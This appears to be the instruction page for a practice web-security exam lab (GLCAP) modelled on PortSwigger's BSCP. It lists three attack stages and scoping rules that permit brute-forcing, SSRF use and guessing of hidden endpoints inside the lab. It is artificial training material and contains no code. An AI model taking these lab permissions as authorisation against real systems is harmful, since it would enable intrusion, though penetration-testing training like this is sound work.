Welcome tester to the GLCAP exam lab! This exam follows many of the rules set out by PortSwigger's BSCP and is built to help you train for that certification. However, the rules are below if you need a reminder while you test:
The lab consists of three stages:
Stage 1: Initial Access - Gain access to a user account on the application
Stage 2: Privilege Escalation - Gain access to the admin panel located at /admin.
Stage 3: Read the file located at "/glcap/flag.txt" from the server's local file system
Once you have the flag, submit it to your exam assessor and you will recieve your kudos!
1. The GLCAP must be completed in order. You CANNOT skip a stage. Do not try to reach /admin without first completing stage 1
2. If you come accross a user enumeration vulnerability, you may be able use the username and password lists to bruteforce valid credentials for any enumerated users
3. Do not attack the exploit server. It is not in-scope for the test, and is there to HELP you.
4. There will always be an admin account with the username "admin" plus a low-privileged account usually called "don".
5. There will always be at most 1 simulated active user who will click on any links they are sent via the exploit server and will visit the home page every 10 seconds
6. Automation is required to solve this lab. (if you can solve it without, please let your assessor know how you did it!) You will require burp pro's scanner, HTTP Request Smuggler and Param Miner at the very least
7. Guessing endpoints / headers is fair game. Some stages require this behaviour. That said, you can find any and all secret endpoints / headers in seclist's "common.txt" and Param Miner's "basic" list
8. If you find an SSRF vulnerability, you can use it to read files from an internal-only service hosted at http://192.168.0.254:5024/
In addition to the techniques taught in PortSwigger's Web Security Academy, many cases you will encounter are based off of our experience in GhostLabs. Therefore, I would highly recommend being comfortable with the tooling resources documented here.